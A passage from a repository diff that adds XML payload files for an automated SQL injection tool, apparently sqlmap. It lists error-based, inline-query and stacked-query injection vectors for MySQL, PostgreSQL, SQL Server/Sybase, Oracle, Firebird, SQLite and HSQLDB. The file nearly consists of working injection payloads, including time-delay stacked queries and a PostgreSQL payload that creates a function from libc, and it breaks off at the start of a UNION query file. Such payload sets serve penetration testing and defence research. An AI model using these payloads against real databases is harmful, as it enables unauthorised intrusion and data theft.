<vector>(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
|
||||
<request>
|
||||
<payload>(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle error-based - Parameter replace</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Firebird error-based - Parameter replace</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
<payload>(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Firebird</dbms>
|
||||
</details>
|
||||
</test>
|
||||
<!-- End of error-based tests - Parameter replace -->
|
||||
|
||||
|
||||
<!-- Error-based tests - GROUP BY and ORDER BY clauses -->
|
||||
<test>
|
||||
<title>MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
|
||||
<request>
|
||||
<payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
<payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
|
||||
<request>
|
||||
<payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
|
||||
<request>
|
||||
<payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.5</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
|
||||
<request>
|
||||
<payload>,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
|
||||
<request>
|
||||
<payload>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle error-based - GROUP BY and ORDER BY clauses</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
<!--
|
||||
TODO: if possible, add payload for SQLite, Microsoft Access
|
||||
and SAP MaxDB - no known techniques at this time
|
||||
-->
|
||||
<!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
|
||||
</root>
|
120
xml/payloads/03_inline_query.xml
Normal file
120
xml/payloads/03_inline_query.xml
Normal file
|
@ -0,0 +1,120 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
|
||||
<root>
|
||||
<!-- Inline queries tests -->
|
||||
<test>
|
||||
<title>MySQL inline queries</title>
|
||||
<stype>6</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
<payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL inline queries</title>
|
||||
<stype>6</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase inline queries</title>
|
||||
<stype>6</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle inline queries</title>
|
||||
<stype>6</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite inline queries</title>
|
||||
<stype>6</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>3</where>
|
||||
<vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
|
||||
<request>
|
||||
<payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>SQLite</dbms>
|
||||
</details>
|
||||
</test>
|
||||
<test>
|
||||
<title>Firebird inline queries</title>
|
||||
<stype>6</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>3</where>
|
||||
<vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
|
||||
<request>
|
||||
<payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Firebird</dbms>
|
||||
</details>
|
||||
</test>
|
||||
<!-- End of inline queries tests -->
|
||||
</root>
|
337
xml/payloads/04_stacked_queries.xml
Normal file
337
xml/payloads/04_stacked_queries.xml
Normal file
|
@ -0,0 +1,337 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
|
||||
<root>
|
||||
<!-- Stacked queries tests -->
|
||||
<test>
|
||||
<title>MySQL > 5.0.11 stacked queries (SELECT)</title>
|
||||
<stype>4</stype>
|
||||
<level>2</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
|
||||
<request>
|
||||
<payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>> 5.0.11</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL > 5.0.11 stacked queries (SELECT - comment)</title>
|
||||
<stype>4</stype>
|
||||
<level>4</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
|
||||
<request>
|
||||
<payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>> 5.0.11</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL > 5.0.11 stacked queries</title>
|
||||
<stype>4</stype>
|
||||
<level>1</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>; SELECT SLEEP([SLEEPTIME])</payload>
|
||||
<comment>-- </comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>> 5.0.11</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL < 5.0.12 stacked queries (heavy query)</title>
|
||||
<stype>4</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
|
||||
<comment>-- </comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL > 8.1 stacked queries</title>
|
||||
<stype>4</stype>
|
||||
<level>1</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
<payload>; SELECT PG_SLEEP([SLEEPTIME])</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
<dbms_version>> 8.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL stacked queries (heavy query)</title>
|
||||
<stype>4</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
<payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL < 8.2 stacked queries (Glibc)</title>
|
||||
<stype>4</stype>
|
||||
<level>4</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
<dbms_version>< 8.2</dbms_version>
|
||||
<os>Linux</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase stacked queries</title>
|
||||
<stype>4</stype>
|
||||
<level>1</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
|
||||
<request>
|
||||
<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
|
||||
<stype>4</stype>
|
||||
<level>5</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
|
||||
<request>
|
||||
<payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle stacked queries (heavy query)</title>
|
||||
<stype>4</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
|
||||
<request>
|
||||
<payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
|
||||
<stype>4</stype>
|
||||
<level>5</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
|
||||
<request>
|
||||
<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
|
||||
<stype>4</stype>
|
||||
<level>5</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
|
||||
<request>
|
||||
<payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite > 2.0 stacked queries (heavy query)</title>
|
||||
<stype>4</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
<payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>SQLite</dbms>
|
||||
<dbms_version>> 2.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Firebird stacked queries (heavy query)</title>
|
||||
<stype>4</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
|
||||
<request>
|
||||
<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Firebird</dbms>
|
||||
<dbms_version>>= 2.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQLDB >= 1.7.2 stacked queries</title>
|
||||
<stype>4</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
|
||||
<request>
|
||||
<payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQLDB</dbms>
|
||||
<dbms_version>>= 1.7.2</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQLDB >= 2.0 stacked queries</title>
|
||||
<stype>4</stype>
|
||||
<level>4</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
|
||||
<request>
|
||||
<payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQLDB</dbms>
|
||||
<dbms_version>>= 2.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||
<!-- End of stacked queries tests -->
|
||||
</root>
|
1574
xml/payloads/05_time_blind.xml
Normal file
1574
xml/payloads/05_time_blind.xml
Normal file
File diff suppressed because it is too large
Load Diff
742
xml/payloads/06_union_query.xml
Normal file
742
xml/payloads/06_union_query.xml
Normal file
|
@ -0,0 +1,742 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
|
||||
<root>
|
||||
<!-- UNION query tests -->
|
||||
<test>
|
||||
